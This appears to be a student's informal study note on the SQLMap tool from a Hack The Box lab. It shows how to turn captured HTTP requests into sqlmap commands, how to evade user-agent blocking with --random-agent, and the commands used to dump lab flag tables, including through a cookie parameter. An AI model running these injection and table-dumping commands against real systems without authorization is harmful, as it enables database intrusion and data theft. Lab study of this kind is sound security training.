SQLMap
Running SQLMap on an HHTP Request
an easy way to get the data to send over is by using copy as cURL in developer tools in the network tab
we can then change curl to sqlmap like so
sqlmap 'http://www.example.com/?id=1' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0' -H 'Accept: image/webp,*/*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'DNT: 1'you can use the -r flag to include a whole request file that you grabbed from a proxy.
sqlmap -r req.txt--random-agent is a valuable switch as a lot of defenses block the sqlmap user agent. we can also use --mobile to pretend to be a mobile device.
When it came to the challenges I was at a bit of a loss on what to do so I cheated a bit and found this URL https://www.zwarts-sec.com/posts/Hack-The-Box-SQLMap-Essentials/
Essentially what we needed to do was grab the header infromation and save it in a file. If the passed parameter in header is custom for instance case 2 and cas4 then you do not need to type the value to (Fuzz? not sure if that is the correct term)
both sql maps are Identical but use the same command as scene here
sqlmap -r Case2.txt --threads 10 --dump -T flag2 --batchand
sqlmap -r Case4.txt --threads 10 --dump -T flag4 --batchwhat we are saying is “Use the .txt files as the header” then use 10 threads to make it go faster. --dump -T flag(2/4) says to dump all table data from the table named flag2 or flag 4 --bath simply says run in default so we dont have to keep approving or denying things
case 3 being
sqlmap -r Case3.txt -p cookie --threads 10 --dump -T flag3 --batchwhat this is saying is fuzz the cookie parameter in the header
Too much work to do more studying